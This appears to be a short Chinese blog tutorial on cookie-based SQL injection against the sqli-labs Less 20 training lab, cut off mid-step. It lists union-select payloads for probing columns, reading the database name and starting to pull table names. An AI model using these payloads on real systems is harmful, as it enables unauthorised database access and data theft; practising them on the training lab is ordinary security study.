17、cookie注入

环境sqli-labs less 20 1、在cookie里输入特殊字符报错 发现是单引号闭合 2、判断字段长度 order by 3正常,order by 4返回错误 3、union联合查询 a’ union select 1,2,3 # 4、获取数据库名称 a’ union select 1,2,database()# 5、获取表名 a’ union select 1,2,group_conc
相关文章
相关标签/搜索